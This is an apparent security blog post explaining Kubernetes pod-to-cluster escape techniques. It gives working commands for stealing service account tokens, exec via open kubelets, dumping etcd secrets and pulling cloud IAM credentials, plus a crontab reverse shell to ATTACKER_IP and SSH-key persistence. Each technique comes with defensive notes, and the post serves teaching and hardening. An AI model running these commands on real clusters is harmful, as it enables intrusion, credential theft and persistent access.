
Kubernetes Escape: From Pod to Cluster Compromise

A technical deep-dive into Kubernetes escape techniques – from service account abuse and kubelet exploitation to etcd pillaging and cloud metadata theft. Every pod is a potential foothold.


As we covered in the Docker escape post, containers share the host kernel. Every isolation boundary is software – namespaces, cgroups, seccomp, capabilities. Kubernetes inherits all of that and stacks an entire distributed system on top: an API server, etcd, kubelets, service accounts, RBAC, flat networking, and cloud metadata endpoints. Each one is an attack vector.

A Docker escape gets you one host. A Kubernetes escape gets you the cluster.

Kubernetes Architecture – How It Actually Works

Before you can break something, you need to understand how it’s built.

A Kubernetes cluster has two parts: the control plane that makes decisions and the worker nodes that run your containers. Every single operation – scheduling a pod, reading a secret, exec-ing into a container – flows through one component: the API server.

flowchart TB
    subgraph cp["Control Plane"]
        API["API Server\n:6443"]
        ETCD["etcd\n:2379"]
        SCHED["Scheduler\n:10259"]
        CM["Controller Manager\n:10257"]
    end

    subgraph node1["Worker Node"]
        KL1["kubelet\n:10250"]
        KP1["kube-proxy"]
        CR1["Container Runtime\n(containerd)"]
        P1["Pod A"]
        P2["Pod B"]
    end

    subgraph node2["Worker Node"]
        KL2["kubelet\n:10250"]
        KP2["kube-proxy"]
        CR2["Container Runtime"]
        P3["Pod C"]
    end

    API <-->|"gRPC/mTLS"| ETCD
    SCHED -->|"HTTPS"| API
    CM -->|"HTTPS"| API
    KL1 <-->|"HTTPS"| API
    KL2 <-->|"HTTPS"| API
    KL1 -->|"CRI (gRPC)"| CR1
    KL2 -->|"CRI (gRPC)"| CR2
    CR1 --> P1 & P2
    CR2 --> P3

The API server (port 6443) is the single point of entry. kubectl commands, component communication, pod-to-API calls – all of it goes through here. It’s the only component that talks directly to etcd. With API server access you can read every secret, create privileged pods on any node, modify RBAC, and tamper with admission webhooks to inject code into every new pod. The old insecure HTTP port (8080) was removed in v1.24. Anonymous authentication is enabled by default upstream – most managed providers scope it down, but the flag is still true. Unauthenticated requests get system:anonymous, which has limited permissions unless someone added ClusterRoleBindings they shouldn’t have.

etcd (port 2379) is a distributed key-value store that holds all cluster state. Every secret, every pod spec, every RBAC policy, every service account token – stored in a flat key-value hierarchy under /registry/. By default, secrets are base64-encoded in etcd, not encrypted. The peer communication port (2380) handles replication between etcd cluster members. Both should require mTLS. Both sometimes don’t.

The scheduler (port 10259) watches for newly created pods with no assigned node and picks one based on resource requirements, affinity rules, taints, and tolerations. It only talks to the API server – never directly to nodes. The controller manager (port 10257) runs dozens of control loops: the replication controller ensures the right number of pod replicas, the node controller monitors node health, and the ServiceAccount controller creates default service accounts and tokens for new namespaces. The controller manager’s service account has broad cluster-wide permissions – its kubeconfig is a high-value target on control plane nodes.

On each worker node, the kubelet (port 10250) is the agent that receives pod specs from the API server and ensures containers are running. It also exposes an HTTPS API that supports exec, logs, and port-forwarding – meaning anyone who can reach port 10250 and bypass authentication can execute commands inside any container on that node. The old read-only port (10255) defaults to disabled when using kubelet config files (the modern approach), but the CLI flag historically defaulted to 10255 – and GKE didn’t disable it by default until v1.32. It still appears in plenty of clusters. The container runtime (containerd, CRI-O) does the actual work of pulling images and running containers via the CRI gRPC interface on a local Unix socket (/run/containerd/containerd.sock). Dockershim was removed in v1.24 – if you’re still seeing /var/run/docker.sock, the cluster is either old or doing something unusual.

kube-proxy runs on every node and implements the Service abstraction using iptables rules (default), IPVS, or nftables. It watches the API server for Service and EndpointSlice changes, then updates local network rules. NodePort services expose on ports 30000-32767 by default – another surface to scan.

Every API request passes three gates: authentication (X.509 certs, bearer tokens, OIDC), authorization (RBAC by default, Node authorization for kubelets), and admission controllers (mutating webhooks first, then validating). Three chances to stop a bad request. Three things that can be misconfigured.

The Security Boundaries

Kubernetes has security features. On paper, they look solid.

Pod Security Standards

Pod Security Standards (PSS) replaced PodSecurityPolicy (removed in v1.25). Three levels:

  • Privileged – unrestricted. Everything allowed.
  • Baseline – blocks known privilege escalation vectors. No privileged: true, no hostPID, no hostNetwork, no hostPath volumes. Still allows running as root.
  • Restricted – hardened. Must run as non-root, must drop ALL capabilities (except NET_BIND_SERVICE), requires a seccomp profile.

Enforcement is per-namespace via labels. Here’s the thing – if you don’t add those labels, you get Privileged. The default is no enforcement at all.
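
Enforcement is nothing more than namespace labels – a minimal sketch (the namespace name is illustrative; `warn` and `audit` report violations without blocking, useful as a dry run before flipping `enforce`):

```yaml
apiVersion: v1
kind: Namespace
metadata:
  name: prod                # illustrative namespace
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/audit: restricted
```

Without these labels, the built-in admission controller applies no restrictions at all.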

RBAC

You know how RBAC works. The part that matters here: the API server prevents you from creating a Role with permissions you don’t already hold – unless you have the escalate verb. And there are a dozen other escalation paths (create pods, bind, impersonate, wildcards) that most teams don’t realize are dangerous. More on those in Technique 7.

Network Policies

By default, every pod can talk to every other pod. Across namespaces. No restrictions. NetworkPolicies can restrict this, but they require a CNI plugin that supports them (Calico, Cilium – not Flannel). And they have to be explicitly created. Most clusters don’t have any.
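
A default-deny policy is a single short manifest – a sketch (namespace name illustrative). It selects every pod and allows no ingress, and it only takes effect if the CNI actually enforces NetworkPolicy:

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-ingress
  namespace: prod           # illustrative
spec:
  podSelector: {}           # empty selector = every pod in the namespace
  policyTypes:
  - Ingress                 # no ingress rules listed = all ingress denied
```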

Service Account Tokens

Every pod gets a service account token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token. Since Kubernetes 1.22, these are projected tokens – time-limited (1 hour, kubelet refreshes them), audience-bound, and tied to the pod’s lifecycle. Kubernetes 1.24 went further and stopped auto-creating long-lived Secret-based tokens entirely. Better than the old never-expiring tokens, but they’re still auto-mounted by default and still let you authenticate to the API server.
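
Under the hood, the kubelet mounts the token as a projected volume – a simplified sketch of what appears in the pod spec (expiry and audience values are illustrative; the audience normally defaults to the API server's):

```yaml
volumes:
- name: kube-api-access
  projected:
    sources:
    - serviceAccountToken:
        path: token
        expirationSeconds: 3600                    # kubelet refreshes before expiry
        audience: https://kubernetes.default.svc   # illustrative audience binding
```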

Admission Controllers

OPA/Gatekeeper and Kyverno are the two main policy engines. They intercept API requests and can block pods that violate security policies – no privileged containers, no hostPath mounts, required labels. They’re powerful. They’re also optional add-ons that most clusters don’t have configured.

Secrets Management

Kubernetes Secrets are base64-encoded, not encrypted. Encryption at rest exists via EncryptionConfiguration but isn’t enabled by default. Everything in etcd – database passwords, API keys, TLS private keys – is one base64 -d away from plaintext.
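
"One base64 -d away" is literal. A sample value of the shape you'd find under .data in any Secret object:

```shell
# A Secret's .data values are encoding, not encryption.
ENCODED='cGFzc3dvcmQxMjM='      # sample value, as stored in etcd / the API
echo "$ENCODED" | base64 -d     # prints: password123
echo
```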

flowchart TB
    subgraph cluster["Kubernetes Cluster"]
        direction TB
        subgraph policy["Policy Layer"]
            PSS["Pod Security Standards\n(default: unenforced)"]
            RBAC["RBAC\n(default: permissive)"]
            AC["Admission Controllers\n(optional add-ons)"]
        end
        subgraph network["Network Layer"]
            NP["Network Policies\n(default: allow all)"]
            SVC["Service Mesh / mTLS\n(optional)"]
        end
        subgraph data["Data Layer"]
            SA["SA Tokens\n(auto-mounted)"]
            SEC["Secrets\n(base64, not encrypted)"]
        end
        subgraph runtime["Runtime Layer"]
            SC["Security Context"]
            SECC["Seccomp / AppArmor"]
            NS["Linux Namespaces"]
            CG["Cgroups"]
        end
    end
    runtime --> KERNEL["Shared Host Kernel"]

Every layer above is opt-in, misconfigurable, or both. The NSA/CISA Kubernetes Hardening Guide and Red Hat’s annual State of Kubernetes Security report consistently find the same gaps in production: over-privileged service accounts, no network segmentation, containers running as root, secrets unencrypted at rest.


Escape Techniques

1. Service Account Token Abuse

This is the technique that actually gets exploited the most in real assessments. Not kernel zero-days, not runtime escapes – just a service account token sitting in a predictable path, waiting to be read.

Every pod gets a token mounted automatically unless someone explicitly set automountServiceAccountToken: false. Most teams don’t.

The token sits at /var/run/secrets/kubernetes.io/serviceaccount/token. The API server address is in the KUBERNETES_SERVICE_HOST environment variable. The CA cert for TLS is at /var/run/secrets/kubernetes.io/serviceaccount/ca.crt. Everything you need to authenticate is already there.

flowchart LR
    POD["Compromised Pod"] -->|"read token"| SA["/var/run/secrets/.../token"]
    SA -->|"Bearer auth"| API["API Server :6443"]
    API -->|"enumerate"| PERMS["Permissions"]
    PERMS -->|"if overprivileged"| SECRETS["Read Secrets"]
    PERMS -->|"if overprivileged"| PODS["Create Pods"]
    PERMS -->|"if overprivileged"| EXEC["Exec into Pods"]
# Step 1: Read the token and discover the API server
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
APISERVER="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}"
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Step 2: Check what permissions this service account has
# (kubectl is rarely in production containers -- stick to curl)
curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  "$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
  -X POST -H "Content-Type: application/json" \
  -d '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectRulesReview","spec":{"namespace":"'$NAMESPACE'"}}'

# Step 3: If you can list secrets -- grab them all
curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  "$APISERVER/api/v1/namespaces/$NAMESPACE/secrets"
# Output: JSON containing every secret in the namespace, base64-encoded

# Step 4: If you can create pods -- spawn a privileged one
# NOTE: This will be rejected if Pod Security Standards (baseline/restricted)
# or admission controllers (OPA/Gatekeeper, Kyverno) are enforced.
# On a hardened cluster, you'll get a 403 with a policy violation message.
curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  "$APISERVER/api/v1/namespaces/$NAMESPACE/pods" \
  -X POST -d '{
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "pwn"},
    "spec": {
      "containers": [{
        "name": "pwn",
        "image": "ubuntu",
        "command": ["sleep","infinity"],
        "securityContext": {"privileged": true}
      }],
      "hostPID": true,
      "hostNetwork": true
    }
  }'

If the service account has cluster-admin or wildcard permissions – reading every secret in every namespace, creating privileged pods, modifying RBAC – that’s full cluster compromise from a single pod. And it happens more often than you’d think. Monitoring agents, CI/CD runners, and Helm-deployed operators regularly get over-privileged service accounts. Security audits consistently find the majority of clusters have excessive RBAC permissions.

peirates (by InGuardians) automates this entire workflow from inside a compromised pod. It discovers service accounts, switches between them, enumerates permissions, harvests secrets, and finds the shortest path to cluster-admin. It’s available in Kali Linux and is built specifically for this attack chain.

Defensive notes: Set automountServiceAccountToken: false on ServiceAccounts and Pods that don’t need API access. Use least-privilege RBAC – never bind cluster-admin to workload service accounts. On 1.24+, projected tokens are short-lived by default, but they still grant access if RBAC is over-permissioned.
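
Opting out of auto-mounting is one field – a sketch (pod name and image are illustrative; the field can be set on the ServiceAccount, the Pod, or both, with the Pod-level setting taking precedence):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: no-token-pod        # illustrative
spec:
  automountServiceAccountToken: false   # no token appears in the container
  containers:
  - name: app
    image: nginx
```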

2. Privileged Pod Escape

Straight callback to the Docker escape post. If you read that one, you already know how this ends.

When a pod runs with securityContext.privileged: true, the container runtime drops all security barriers: every Linux capability is granted (including CAP_SYS_ADMIN), seccomp filtering is disabled, AppArmor/SELinux confinement is removed, and the container gets full access to the host’s /dev devices. The container is root on the host with a slightly different filesystem view.

flowchart LR
    PRIV["Privileged Pod\n+ hostPID: true"] -->|"nsenter"| PID1["Host PID 1"]
    PID1 --> HOST["Root Shell on Host"]
    HOST --> KUBELET["Kubelet Credentials"]
    HOST --> SECRETS["Node-level Secrets"]
    HOST --> OTHER["Other Pods on Node"]
# Step 1: If you land in a privileged pod with hostPID, it's one command
# (nsenter is in util-linux — most base images include it, but minimal
# images like distroless won't. If missing, mount the host disk instead.)
nsenter --target 1 --mount --uts --ipc --net --pid -- bash
# You are now root on the host node

# Step 2: Verify
hostname          # host's real hostname, not the pod name
cat /etc/os-release
ip addr           # host network interfaces
ps aux            # every process on the node

# Step 3: Grab the kubelet's credentials for lateral movement
cat /var/lib/kubelet/kubeconfig
cat /var/lib/kubelet/pki/kubelet-client-current.pem
cat /etc/kubernetes/admin.conf  # if this is a control plane node -- jackpot

Without hostPID, you can still mount the host’s disk directly:

# Inside a privileged pod (without hostPID)
# Step 1: Find the host's root partition
fdisk -l
# Output: /dev/sda1, /dev/vda1, or /dev/nvme0n1p1

# Step 2: Mount it
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host

# Step 3: Steal everything
cat /mnt/host/etc/shadow
cat /mnt/host/etc/kubernetes/admin.conf
cat /mnt/host/root/.ssh/id_rsa

As we covered in the Docker escape post, --privileged gives you full node access. In Kubernetes, it’s the same flag in a different config file.

Defensive notes: Enforce Pod Security Standards at baseline or restricted level – both block privileged: true, hostPID, and hostNetwork. Use OPA/Gatekeeper or Kyverno to enforce this cluster-wide.
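
As a sketch of what cluster-wide enforcement looks like in Kyverno (policy name and message are illustrative – verify the pattern syntax against the Kyverno documentation for your version):

```yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: disallow-privileged         # illustrative
spec:
  validationFailureAction: Enforce  # block, don't just audit
  rules:
  - name: deny-privileged-hostpid
    match:
      any:
      - resources:
          kinds:
          - Pod
    validate:
      message: "Privileged mode, hostPID, and hostNetwork are not allowed."
      pattern:
        spec:
          =(hostPID): "false"       # =() means: if present, must match
          =(hostNetwork): "false"
          containers:
          - =(securityContext):
              =(privileged): "false"
```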

3. Host Path Mounts

You don’t need a privileged pod if someone helpfully mounted the host filesystem for you.

I keep seeing this in the wild: monitoring agents with /var/log, log shippers with /var/lib/docker/containers, dev teams with / mounted because “it’s just staging.” Every one of these is a container escape waiting to happen.

# A pod spec that gives you the entire host filesystem
apiVersion: v1
kind: Pod
metadata:
  name: hostpath-exploit
spec:
  containers:
  - name: exploit
    image: ubuntu:latest
    command: ["sleep", "infinity"]
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /
      type: Directory
# Once inside, the host root is at /host
# Step 1: Steal credentials
cat /host/etc/shadow
cat /host/etc/kubernetes/admin.conf
cat /host/var/lib/kubelet/kubeconfig
cat /host/root/.ssh/id_rsa

# Step 2: Plant persistence
echo "ssh-rsa AAAA...your-key" >> /host/root/.ssh/authorized_keys
echo "* * * * * root bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /host/etc/crontab

# Step 3: Or just chroot and become the host
chroot /host bash

Mounting /var/run/docker.sock (or /run/containerd/containerd.sock on modern clusters) is equally lethal – it gives you control over the container runtime, which means you can create new privileged containers. As we covered in the Docker escape post, socket access equals daemon access equals root on the host. On modern clusters running containerd, the socket uses gRPC instead of a REST API, so exploitation requires ctr or crictl instead of curl:

# With containerd socket mounted at /run/containerd/containerd.sock
ctr -a /run/containerd/containerd.sock containers list
crictl --runtime-endpoint unix:///run/containerd/containerd.sock pods

Even mounting something seemingly innocent like /var/log can be dangerous – host logs may contain authentication attempts, cloud-init bootstrap tokens, or symlinks that can be abused to read arbitrary files through the kubelet’s log endpoint.

Defensive notes: PSS baseline and restricted both block hostPath volumes. If you must use them, restrict to specific paths and mount read-only. Never mount /, /etc, or runtime sockets into workload pods.
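
When a hostPath genuinely can't be avoided, scope it down – a sketch (container name and path are illustrative):

```yaml
containers:
- name: shipper             # illustrative log shipper
  image: busybox
  volumeMounts:
  - name: app-logs
    mountPath: /logs
    readOnly: true          # read-only at the mount point
volumes:
- name: app-logs
  hostPath:
    path: /var/log/myapp    # a specific subdirectory, never /
    type: Directory         # fail if the path doesn't already exist
```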

4. Kubelet API – The Forgotten Door

Every worker node runs a kubelet. The kubelet exposes an HTTPS API on port 10250. This API can list pods, read logs, and – critically – execute commands inside any container on that node.

The kubelet also historically exposed a read-only HTTP API on port 10255 (disabled by default since v1.16, but still found in older or misconfigured clusters). Even the read-only port leaks pod specs, environment variables, and metadata.

The key configuration flags are --anonymous-auth and --authorization-mode. The upstream Kubernetes defaults are insecure: --anonymous-auth=true and --authorization-mode=AlwaysAllow. Most managed providers (GKE, EKS, AKS) and kubeadm override these to use Webhook authorization and disable anonymous auth. But self-managed clusters, custom installations, and legacy deployments often ship with the upstream defaults – and that means anyone with network access to port 10250 can exec into any container on that node. kube-hunter (Aqua Security) can scan for this automatically: kube-hunter --remote NODE_IP --active will probe the kubelet and report if anonymous exec is possible.

sequenceDiagram
    participant A as Attacker
    participant K as Kubelet :10250
    participant P1 as Pod A
    participant P2 as Pod B
    participant P3 as Pod C

    A->>K: GET /pods (list all pods on node)
    K-->>A: Pod names, namespaces, containers
    A->>K: POST /run/default/pod-a/container (exec)
    K->>P1: Execute command
    P1-->>K: Command output
    K-->>A: "uid=0(root)"
    A->>K: POST /run/kube-system/pod-b/container
    K->>P2: Execute command
    Note over A,P2: Lateral movement across<br/>all pods on this node
# These commands assume anonymous auth is enabled and authorization is AlwaysAllow.
# On properly configured clusters, you'll get 401 Unauthorized or 403 Forbidden.
# Managed providers (EKS, GKE, AKS) typically block this by default.

# Step 1: List all pods on the node
curl -sk https://NODE_IP:10250/pods | jq '.items[].metadata.name'
# Output (if unauthenticated access is allowed):
# "coredns-5dd5756b68-abc12"
# "kube-proxy-xyz78"
# "nginx-deployment-7f9b8c-def34"

# Step 2: Execute a command in any container
# Format: /run/<namespace>/<pod>/<container>
curl -sk https://NODE_IP:10250/run/default/nginx-deployment-7f9b8c-def34/nginx \
  -d "cmd=id"
# Output: uid=0(root) gid=0(root) groups=0(root)

# Step 3: Steal the service account token from that pod
curl -sk https://NODE_IP:10250/run/default/nginx-deployment-7f9b8c-def34/nginx \
  -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"
# Output: eyJhbGciOiJSUzI1NiIsImtpZCI6I... (JWT token)

# Step 4: Read container logs
curl -sk https://NODE_IP:10250/containerLogs/kube-system/coredns-5dd5756b68-abc12/coredns

The kubeletctl tool (by CyberArk) automates this:

# Scan a network for open kubelet APIs
kubeletctl scan --cidr 10.0.0.0/24

# List pods on a specific node
kubeletctl pods --server 10.0.0.1

# Scan for containers that allow RCE
kubeletctl scan rce --server 10.0.0.1

# Scan for service account tokens
kubeletctl scan token --server 10.0.0.1

# Execute a command (run = non-interactive, returns output directly)
kubeletctl run "cat /etc/shadow" -p nginx-pod -c nginx -s 10.0.0.1

From a single compromised pod, you reach the node’s kubelet. From the kubelet, you exec into every other pod on that node. Steal their service account tokens. Find one with elevated permissions. Pivot to the API server. If the node has nodes/proxy permissions exposed via RBAC, you can even proxy API requests through the kubelet to other kubelets – hopping across nodes without touching the API server directly.

This is exactly how real attacks work. TeamTNT’s Hildegard campaign (2021, documented by Palo Alto Unit 42) scanned for unauthenticated kubelets, exec’d into pods, stole service account tokens and cloud credentials, established C2 channels, and deployed cryptominers across entire clusters. The kubelet was the initial foothold. Everything else cascaded from there.

Defensive notes: Set --anonymous-auth=false and --authorization-mode=Webhook on all kubelets. Restrict network access to port 10250 – only the control plane should reach it. Enable the NodeRestriction admission plugin to limit what kubelets can read to only their own node’s pods.
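
The same hardening expressed in the kubelet config file (typically /var/lib/kubelet/config.yaml on kubeadm-managed nodes) – a sketch:

```yaml
apiVersion: kubelet.config.k8s.io/v1beta1
kind: KubeletConfiguration
authentication:
  anonymous:
    enabled: false          # reject unauthenticated requests
  webhook:
    enabled: true           # delegate token review to the API server
authorization:
  mode: Webhook             # check authorization instead of AlwaysAllow
readOnlyPort: 0             # keep the legacy 10255 port disabled
```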

5. etcd – Secrets in Plaintext

etcd is the brain of the cluster. Every object that exists in Kubernetes – every pod, every secret, every RBAC policy, every service account – is a key-value pair in etcd. Compromise etcd and you skip the API server entirely. No RBAC checks, no admission controllers, no audit logs. Just raw, unfiltered access to everything.

Default kubeadm installations put etcd on port 2379 with mTLS. But “default” and “what’s actually deployed” are different things. Misconfigured clusters expose etcd without TLS, listen on 0.0.0.0 instead of localhost, or use weak certificate management. Shodan regularly finds thousands of exposed etcd instances.

flowchart LR
    ATTACKER["Attacker"] -->|"port 2379"| ETCD["etcd"]
    ETCD --> SECRETS["All Secrets\n(base64)"]
    ETCD --> TOKENS["SA Tokens"]
    ETCD --> RBAC["RBAC Policies"]
    ETCD --> CERTS["TLS Certificates"]
    ETCD --> PODS["Pod Specs\n(env vars, volumes)"]
    SECRETS & TOKENS --> CLUSTER["Full Cluster\nCompromise"]
# Most production clusters require mTLS for etcd access.
# Plain HTTP access (below) indicates severe misconfiguration.
# If you've compromised a control plane node, the TLS certs are at
# /etc/kubernetes/pki/etcd/ — use those instead (shown in Step 4).

# Step 1: Connect to etcd (unauthenticated -- misconfigured)
export ETCDCTL_API=3
etcdctl --endpoints=http://ETCD_IP:2379 endpoint health
# Output: http://ETCD_IP:2379 is healthy

# Step 2: Enumerate all keys
etcdctl --endpoints=http://ETCD_IP:2379 get / --prefix --keys-only | head -20
# Output:
# /registry/clusterrolebindings/cluster-admin
# /registry/clusterroles/cluster-admin
# /registry/configmaps/kube-system/coredns
# /registry/secrets/default/database-credentials
# /registry/secrets/kube-system/admin-token-xxxxx
# /registry/serviceaccounts/default/default
# ...

# Step 3: Extract all secrets
etcdctl --endpoints=http://ETCD_IP:2379 get /registry/secrets --prefix | strings
# Output: raw strings from protobuf-encoded secrets including
# base64 values that decode to passwords, API keys, TLS private keys

# Step 4: If etcd requires TLS (and you have the certs from a compromised node)
etcdctl --endpoints=https://127.0.0.1:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/server.crt \
  --key=/etc/kubernetes/pki/etcd/server.key \
  get /registry/secrets --prefix --keys-only

# Step 5: Extract a specific secret
etcdctl --endpoints=http://ETCD_IP:2379 \
  get /registry/secrets/default/database-credentials
# Pipe through strings or hexdump to extract the base64 values

The impact is total. With etcd write access, you can also modify RBAC policies, inject malicious pod specs, and create new cluster-admin bindings – all without going through the API server’s admission controllers or audit logging. You’re operating below the security model entirely.

If etcd is compromised, the cluster is gone. Recovery means rotating every credential – every service account token, every TLS certificate, every secret, every kubeconfig. There’s no shortcut. CVE-2021-28235 (CVSS 9.8) demonstrated this directly – an authentication bypass in etcd allowed unauthenticated access to the entire datastore. And CVE-2023-32082 (CVSS 3.1) showed that even etcd’s own RBAC had authorization bypass issues, with the LeaseTimeToLive API returning key names the requesting user shouldn’t have been able to see. TeamTNT actively scanned for exposed etcd instances, extracted secrets, and used the stolen cloud credentials for lateral movement into AWS and GCP accounts.

Defensive notes: Enable encryption at rest via EncryptionConfiguration (use aescbc or KMS provider). Require mTLS for all etcd client and peer communication. Bind etcd to localhost only. Restrict network access to port 2379 – only the API server should have etcd client certificates.
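
An EncryptionConfiguration sketch, passed to the API server via --encryption-provider-config (the key value is a placeholder – generate a real one with `head -c 32 /dev/urandom | base64`):

```yaml
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
- resources:
  - secrets
  providers:
  - aescbc:
      keys:
      - name: key1
        secret: REPLACE_WITH_BASE64_32_BYTE_KEY   # placeholder
  - identity: {}            # fallback so existing plaintext data stays readable
```

New and updated secrets are written encrypted; existing ones must be rewritten (e.g. `kubectl get secrets -A -o json | kubectl replace -f -`) to pick up encryption.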

6. Cloud Metadata API – From Pod to Cloud Account

This is the one that turns a container compromise into a cloud account takeover. If your cluster runs on AWS, GCP, or Azure, there’s a metadata endpoint reachable from every pod that hands out IAM credentials to anything that asks.

The endpoint is 169.254.169.254 on AWS and Azure, metadata.google.internal (also 169.254.169.254) on GCP. But the headers, paths, and token mechanisms differ across providers.

flowchart LR
    POD["Compromised Pod"] -->|"curl 169.254.169.254"| META["Cloud Metadata API"]
    META -->|"IAM credentials"| CREDS["Temporary Access Keys"]
    CREDS --> S3["S3 Buckets"]
    CREDS --> EC2["EC2 Instances"]
    CREDS --> RDS["Databases"]
    CREDS --> IAM["IAM Escalation"]
    IAM --> ACCOUNT["Full Cloud Account"]

AWS (IMDSv1 – no token required):

# Step 1: Discover the IAM role attached to the node
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Output: eks-node-role

# Step 2: Get temporary credentials
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-node-role
# Output:
# {
#   "AccessKeyId": "ASIA...",
#   "SecretAccessKey": "wJal...",
#   "Token": "FwoGZXIvY...",
#   "Expiration": "2026-03-25T20:00:00Z"
# }

# Step 3: Use them
export AWS_ACCESS_KEY_ID="ASIA..."
export AWS_SECRET_ACCESS_KEY="wJal..."
export AWS_SESSION_TOKEN="FwoGZXIvY..."
aws s3 ls                    # list all S3 buckets
aws ec2 describe-instances   # list all EC2 instances
aws iam list-roles           # enumerate IAM roles

AWS IMDSv2 adds a session token requirement. It’s meant to block SSRF attacks because it requires a PUT request with a hop limit:

# IMDSv2 requires a token first (PUT request with TTL header)
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

# Then use the token for metadata requests
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/

But here’s the catch – if you’re already inside the pod (not doing SSRF from outside), you can make the PUT request yourself. IMDSv2’s real defense is the hop limit: the PUT response has an IP TTL of 1, so it can’t traverse network hops. Since Kubernetes pods are in a separate network namespace from the host, this should block pod access. But EKS sets the hop limit to 2 by default on managed node groups, specifically so pods can reach IMDS. So on EKS, IMDSv2 is no obstacle from a compromised pod.

GCP uses a different endpoint and requires the Metadata-Flavor: Google header (requests with X-Forwarded-For are rejected as SSRF protection):

# Get an access token for the node's service account
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
# Output: {"access_token":"ya29.c.Eln...","expires_in":3599,"token_type":"Bearer"}

On older GKE clusters, the metadata endpoint also exposed kube-env, which contained kubelet bootstrap credentials – one HTTP request from a pod gave you node-level API access.

Azure uses the Metadata:true header and a different URL path:

# Get a managed identity token for Azure Resource Manager
curl -s -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# Output: {"access_token":"eyJ0eXA...","expires_in":"86399","token_type":"Bearer"}

AWS has mitigations: EKS supports IRSA (IAM Roles for Service Accounts) and EKS Pod Identity, which use OIDC to provide pod-level IAM credentials without touching the metadata API. GKE has Workload Identity. Azure has Azure AD Workload Identity. But these have to be configured – the default on all three clouds is that the node’s IAM role is accessible from every pod.

This is how you go from a pod to owning the cloud account. Capital One’s 2019 breach – 106 million customer records – started with exactly this pattern: SSRF to the metadata API, stolen IAM credentials, S3 data exfiltration. Tesla’s 2018 Kubernetes breach (discovered by RedLock) followed the same path: exposed Kubernetes dashboard, AWS credentials in pod environment variables, cryptomining on Tesla’s AWS infrastructure.

Defensive notes: Use pod-level identity instead of node-level: IRSA or EKS Pod Identity on AWS, Workload Identity on GKE, Azure AD Workload Identity on AKS. Block egress to 169.254.169.254/32 via NetworkPolicy for pods that don’t need metadata access. On AWS, enforce IMDSv2-only with hop limit of 1 to block pod access entirely.
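
The egress block looks like this – a sketch (namespace name illustrative; requires a CNI that enforces egress policies, such as Calico or Cilium):

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-metadata
  namespace: prod           # illustrative
spec:
  podSelector: {}           # every pod in the namespace
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 169.254.169.254/32   # everything allowed except the metadata endpoint
```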

7. RBAC Misconfigurations and Privilege Escalation

This is where most teams mess up. RBAC is supposed to prevent everything above, but the gap between “we have RBAC” and “our RBAC is actually secure” is enormous. I’ve reviewed clusters where the CI/CD service account had cluster-admin because someone copied a Helm chart example three years ago and never revisited it.

Several permissions look harmless but are actually escalation paths:

flowchart TB
    PERMS["Dangerous RBAC Permissions"]
    PERMS --> CP["create pods"]
    PERMS --> CRB["create clusterrolebindings\n+ bind verb"]
    PERMS --> ESC["escalate verb\non roles"]
    PERMS --> IMP["impersonate\nusers/groups"]
    PERMS --> WILD["wildcard *\non verbs/resources"]
    PERMS --> CSR["create/approve\nCSRs"]

    CP --> PRIV["Mount any SA token\nRun privileged"]
    CRB --> ADMIN["Bind cluster-admin\nto yourself"]
    ESC --> ADMIN2["Create role with\nany permission"]
    IMP --> MASTERS["Act as\nsystem:masters"]
    WILD --> GOD["Implicitly includes\nall of the above"]
    CSR --> CERT["Forge certificates\nfor system:masters"]

create pods is the most common escalation. If you can create a pod, you can specify any service account (spec.serviceAccountName), mount hostPath volumes, and run privileged. That one permission gives you everything.

escalate on roles bypasses the API server’s guard against privilege escalation. Normally you can’t create a Role with more permissions than you have. The escalate verb removes that check entirely.

bind on roles/clusterroles lets you create a RoleBinding or ClusterRoleBinding referencing any existing role, including cluster-admin, without holding those permissions yourself.

impersonate lets you make API requests as any user or group. Including system:masters, which is hardcoded to bypass all RBAC.
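Put together, a role like this hypothetical one looks boring in review, yet every rule on its own is a path to cluster-admin:

```yaml
# Hypothetical ClusterRole: each rule alone is sufficient for full escalation.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: ci-helper
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["create"]             # run any SA, privileged, hostPath
- apiGroups: ["rbac.authorization.k8s.io"]
  resources: ["clusterroles"]
  verbs: ["escalate", "bind"]   # bypass the escalation guard; bind cluster-admin
- apiGroups: [""]
  resources: ["users", "groups"]
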